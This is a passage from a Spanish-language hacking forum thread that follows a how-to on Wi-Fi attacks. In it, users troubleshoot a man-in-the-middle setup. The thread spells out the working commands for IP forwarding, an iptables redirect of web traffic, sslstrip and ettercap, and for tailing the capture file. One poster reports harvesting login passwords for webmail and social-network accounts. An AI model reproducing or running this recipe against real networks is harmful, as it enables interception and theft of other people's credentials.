Autor
|
Tema: [HOW TO] Ataque modelo Wifi (Leído 138,627 veces)
|
chatarrero
|
# sudo su - # echo "1" > /proc/sys/net/ipv4/ip_forward
o puedes usar:
# sudo sysctl -w .net.ipv4.ip_forward=1
o con Fragrouter:
# sudo fragrouter -B1
Con eso si me lo hace pero al poner el comando sudo python sslstrip.py -w captura_sslstrip -s -l 5555 -k -f me da el error python:can´t open file `sslstrip.py´:[errno 2] No such file or directory y no hay manera de solucionarlo. Saludos
|
|
|
|
|
|
|
kamsky
|
te repito lo de antes, estas en la carpeta del binario?!!??!?!
|
|
|
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
chatarrero
|
te repito lo de antes, estas en la carpeta del binario?!!??!?!
Si estoy en esa carpeta pero estaba haciendo una cosa mal.
|
|
« Última modificación: 24 Diciembre 2009, 11:59 am por radykal »
|
|
|
|
|
chatarrero
|
Saludos
Cuando ejecuto el comando /pentest/spoofing/sslstrip$ sudo python sslstrip.py -w dalle -s -l 5555 -k -f Me da este Error Traceback (most recent call last): File "sslstrip.py", line 254, in <module> main(sys.argv[1:]) File "sslstrip.py", line 246, in main server = ThreadingHTTPServer(('', listenPort), StripProxy) File "/usr/lib/python2.5/SocketServer.py", line 330, in __init__ self.server_bind() File "/usr/lib/python2.5/BaseHTTPServer.py", line 101, in server_bind SocketServer.TCPServer.server_bind(self) File "/usr/lib/python2.5/SocketServer.py", line 341, in server_bind self.socket.bind(self.server_address) File "<string>", line 1, in bind TypeError: an integer is required
|
|
|
|
|
|
|
kamsky
|
parece que hay problemas con alguna librería, pero no es el post adecuado, aquí se habla del pape en general, no del uso particular de las herramientas, así que busca en google o abre un post en gnu/linux
|
|
|
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
chatarrero
|
Ya lo he hecho funcionar El problema que en el sslstrip no me aparece ninguna clave cuando hago el tail -f captura y me logue en gmail,ebuddy,en una red social, ebuddy y un foro y solo me ha dado el ettercp la clave del foro de lo otro pasan los dos programas Saludos
|
|
« Última modificación: 28 Diciembre 2009, 18:59 pm por radykal »
|
|
|
|
|
c0smico
|
Excelente post, realmente educativo
|
|
|
|
"No me preguntes nada. Piensa por ti mismo y cuestiona a la autoridad." -Timothy Leary
|
|
|
kamsky
|
@ radykal: tiene que aparecer, algo estarás haciendo mal...
|
|
|
|
hack 4 free!!
|
|
|
chatarrero
|
Pues no se que estoy haciendo mal Esto es lo que hago
# sudo su - # echo "1" > /proc/sys/net/ipv4/ip_forward
luego # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sudo python sslstrip.py -w loquesea -s -l 5555 -k -f
# tail -f loquesea
espero que me podais ayudar
Saludos
|
|
|
|
|
|
|
chatarrero
|
Buenas
He conseguido que me aparezcan las claves pero algunas me aparece como cifradas porque aparecen no es la clave o en otra codificación.
Saludos
PD Os pasa a alguno que en vez de aparecer la clave os pone hash_passwrd= y una serie de caracteres (creo que en hexadecimal) que no son la clave o si lo es hay que convertirla a otro formato porque no se parece en nada a la original.
Saludos
|
|
« Última modificación: 1 Enero 2010, 20:27 pm por radykal »
|
|
|
|
|
|
Mensajes similares |
|